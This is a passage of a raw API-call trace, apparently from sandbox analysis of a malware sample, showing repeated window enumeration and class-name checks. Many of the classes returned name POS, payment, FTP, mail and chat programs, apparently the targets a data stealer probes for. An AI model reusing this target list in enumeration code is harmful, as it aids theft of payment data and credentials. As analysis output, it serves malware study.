16 [0145.727] GetClassNameA (in: hWnd=0x10098, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x100bc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.727] GetClassNameA (in: hWnd=0x10080, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0145.727] GetClassNameA (in: hWnd=0x20048, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0145.728] GetClassNameA (in: hWnd=0x100d6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.728] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0145.728] GetClassNameA (in: hWnd=0x602d8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0145.728] GetClassNameA (in: hWnd=0x301fc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0145.728] GetClassNameA (in: hWnd=0x20206, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.728] GetClassNameA (in: hWnd=0x10218, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.728] GetClassNameA (in: hWnd=0x10216, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.728] GetClassNameA (in: hWnd=0x60196, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0145.728] GetClassNameA (in: hWnd=0x20294, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0856F940-a731f7f") returned 28 [0145.728] GetClassNameA (in: hWnd=0x30268, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0145.729] GetClassNameA (in: hWnd=0x202a4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0145.729] GetClassNameA (in: hWnd=0x20246, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0145.729] GetClassNameA (in: hWnd=0x30282, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.729] GetClassNameA (in: hWnd=0x20270, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0488D538-a45537c") returned 28 [0145.729] GetClassNameA (in: hWnd=0x40238, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0145.729] GetClassNameA (in: hWnd=0x202c0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0145.729] GetClassNameA (in: hWnd=0x502c2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0145.729] GetClassNameA (in: hWnd=0x202be, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.729] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0145.729] GetClassNameA (in: hWnd=0x3013a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.729] GetClassNameA (in: hWnd=0x10212, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.729] GetClassNameA (in: hWnd=0x20084, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0145.729] GetClassNameA (in: hWnd=0x301f8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0145.729] GetClassNameA (in: hWnd=0x20122, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.730] GetClassNameA (in: hWnd=0x301fe, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.730] GetClassNameA (in: hWnd=0x10316, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="yahoomessenger") returned 14 [0145.730] GetClassNameA (in: hWnd=0x10314, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="weapon_class") returned 12 [0145.730] GetClassNameA (in: hWnd=0x10312, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="afr38_cls") returned 9 [0145.730] GetClassNameA (in: hWnd=0x10310, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="creditserviceapp") returned 16 [0145.730] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="mxslipstream_win") returned 16 [0145.730] GetClassNameA (in: hWnd=0x1030c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="issposwnd") returned 9 [0145.730] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="winscp_window") returned 13 [0145.730] GetClassNameA (in: hWnd=0x10308, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="webdrivewnd") returned 11 [0145.730] GetClassNameA (in: hWnd=0x10306, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0145.730] GetClassNameA (in: hWnd=0x10304, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="scriptftp_class") returned 15 [0145.730] GetClassNameA (in: hWnd=0x10302, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="fpos_app") returned 8 [0145.731] GetClassNameA (in: hWnd=0x10300, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="smartftp_class") returned 14 [0145.731] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="edcsvrwindow") returned 12 [0145.731] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="thunderbirdapp") returned 14 [0145.731] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Begincls") returned 8 [0145.731] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ccv_serverwnd") returned 13 [0145.731] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="aldelo_wnd") returned 10 [0145.731] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="centralcreditcard_app") returned 21 [0145.731] GetClassNameA (in: hWnd=0x102f6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="utg2app") returned 7 [0145.731] GetClassNameA (in: hWnd=0x102f4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="trillian_wnd") returned 12 [0145.731] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="accupos_win") returned 11 [0145.731] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="whatsapp_") returned 9 [0145.731] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="outlook_wnd") returned 11 [0145.731] GetClassNameA (in: hWnd=0x102ec, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="spcwinwindow") returned 12 [0145.732] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="omnipos_app") returned 11 [0145.732] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="spgagentservicecls") returned 18 [0145.732] GetClassNameA (in: hWnd=0x30132, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="skype_win") returned 9 [0145.732] GetClassNameA (in: hWnd=0x401e8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0145.732] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="operamailapp") returned 12 [0145.732] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="leechftpapp") returned 11 [0145.732] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="icqapp") returned 6 [0145.732] GetClassNameA (in: hWnd=0x10290, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ncftpwnd") returned 8 [0145.732] GetClassNameA (in: hWnd=0x10292, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="notepadapp") returned 10 [0145.732] GetClassNameA (in: hWnd=0x10288, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="gmailnotifierprowin") returned 19 [0145.732] GetClassNameA (in: hWnd=0x10276, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="foxmailincmail_cls") returned 18 [0145.732] GetClassNameA (in: hWnd=0x10272, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="fling_app") returned 9 [0145.732] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="flashfxpwnd") returned 11 [0145.732] GetClassNameA (in: hWnd=0x10266, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="coreftp_cls") returned 11 [0145.732] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="filezilla_class") returned 15 [0145.733] GetClassNameA (in: hWnd=0x10264, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="farwin") returned 6 [0145.733] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="bitkinex_wnd") returned 12 [0145.733] GetClassNameA (in: hWnd=0x10252, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="barca_win") returned 9 [0145.733] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="absolutetelnetwnd") returned 17 [0145.733] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="alftp_class") returned 11 [0145.733] GetClassNameA (in: hWnd=0x10244, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="3dftpwin") returned 8 [0145.733] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DecideEnergytendcls") returned 19 [0145.733] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="diseasevictimCanwin") returned 19 [0145.733] GetClassNameA (in: hWnd=0x10222, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="kill") returned 4 [0145.733] GetClassNameA (in: hWnd=0x10204, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="standard") returned 8 [0145.733] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Hang_around_Rise_") returned 17 [0145.734] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="option_also_") returned 12 [0145.734] GetClassNameA (in: hWnd=0x10208, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="SpeechHoweverSurfacewnd") returned 23 [0145.734] GetClassNameA (in: hWnd=0x201e6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="national_window") returned 15 [0145.734] GetClassNameA (in: hWnd=0x10200, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Piececls") returned 8 [0145.734] GetClassNameA (in: hWnd=0x301f2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="OurBeatcls") returned 10 [0145.734] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="factor_free_") returned 12 [0145.734] GetClassNameA (in: hWnd=0x201d8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Light_Tough_app") returned 15 [0145.734] GetClassNameA (in: hWnd=0x30036, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Born_Degree_Return_") returned 19 [0145.734] GetClassNameA (in: hWnd=0x2013c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="againstwin") returned 10 [0145.734] GetClassNameA (in: hWnd=0x20140, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="This") returned 4 [0145.734] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="LoveGaswnd") returned 10 [0145.734] GetClassNameA (in: hWnd=0x101be, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0145.734] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.734] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0145.734] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.735] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0145.735] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0145.735] GetClassNameA (in: hWnd=0x10110, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.735] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0145.735] GetClassNameA (in: hWnd=0x20152, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.735] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.735] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0145.735] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0145.735] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.735] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0145.735] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0145.735] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0145.735] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x200da, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0145.736] GetClassNameA (in: hWnd=0x20040, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0145.736] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0145.736] GetClassNameA (in: hWnd=0x20030, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.736] GetClassNameA (in: hWnd=0x2002e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0145.736] GetClassNameA (in: hWnd=0x40038, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x101c8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0145.736] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0145.736] GetClassNameA (in: hWnd=0x10078, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0145.736] GetClassNameA (in: hWnd=0x10074, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0145.736] GetClassNameA (in: hWnd=0x10022, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0145.736] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0145.737] GetClassNameA (in: hWnd=0x30298, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0145.737] GetClassNameA (in: hWnd=0x302a6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0145.737] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0145.737] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x10160, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x10150, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x10178, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0145.737] GetClassNameA (in: hWnd=0x10082, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x50198, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x601d6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x2023e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.737] GetClassNameA (in: hWnd=0x3029e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x202d6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x20126, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x1034c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x1034a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x10348, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x10346, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x10344, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x10342, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.738] GetClassNameA (in: hWnd=0x10340, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x10338, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x10336, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x10334, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x10332, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x10330, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.739] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10328, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10326, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10324, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10322, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10320, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x1031c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x1031a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x10318, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.740] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x10296, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x10286, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x10284, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x10280, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x10278, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.741] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10254, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10248, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10240, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10236, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10232, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10230, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10226, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.742] GetClassNameA (in: hWnd=0x10224, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x30148, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x401de, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x30070, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x101c0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x10190, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0145.743] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.743] GetClassNameA (in: hWnd=0x100e8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.744] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.744] GetClassNameA (in: hWnd=0x2003c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.744] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.744] GetClassNameA (in: hWnd=0x10076, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0145.744] Sleep (dwMilliseconds=0x64) [0145.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0145.873] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0145.873] GetClassNameA (in: hWnd=0x10128, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0145.873] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0145.873] GetClassNameA (in: hWnd=0x10106, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.873] GetClassNameA 